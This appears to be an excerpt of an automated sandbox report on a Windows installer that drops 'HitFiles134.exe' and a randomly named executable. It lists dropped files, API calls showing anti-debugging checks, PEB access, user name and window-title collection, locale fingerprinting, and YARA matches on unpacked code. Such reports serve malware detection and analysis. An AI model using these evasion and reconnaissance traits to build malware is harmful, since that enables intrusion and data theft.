Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404206 push 00404391h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040C218 push eax; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004042E8 push 00404391h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404283 push 00404391h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408E98 push 00408ECBh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004098B4 push 004098F1h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004583E0 push 00458424h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00410640 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040A6C8 push esp; retf |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00412898 push 004128FBh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004429EC push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00450ACC push 00450AFFh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00456B74 push 00456BACh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00492C14 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00450C90 push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045EE34 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00483278 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040546D push eax; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040553D push 00405749h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004055BE push 00405749h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040563B push 00405749h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004056A0 push 00405749h; ret |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004311AD push esi; ret |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040F4BB push ecx; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0044AC04 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_RegDLL.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_shfoldr.dll | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Program Files (x86)\Split Files\is-S7F6P.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_iscrypt.dll | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Program Files (x86)\Split Files\unins000.exe (copy) | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Program Files (x86)\Split Files\HitFiles134.exe | Jump to dropped file |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_setup64.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00424104 IsIconic,SetActiveWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00417508 IsIconic,GetCapture, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004815E0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0044AC04 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
Source: C:\Users\user\Desktop\file.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_RegDLL.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_shfoldr.dll | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-S7F6P.tmp | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy) | Jump to dropped file |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_setup64.tmp | Jump to dropped file |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004738D8 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00451D34 FindFirstFileA,GetLastError, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004960EC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00462DD8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00463254 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0046184C FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00423E2D FindFirstFileExW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000959D FindFirstFileExW, |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\ |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0044AC04 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040F789 SetUnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0042DF24 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, |
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: Program Manager |
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: program manager |
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: F.program manager |
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA, |
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: GetLocaleInfoA, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: GetLocaleInfoA, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000002.332146458.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.330440301.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.332003406.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |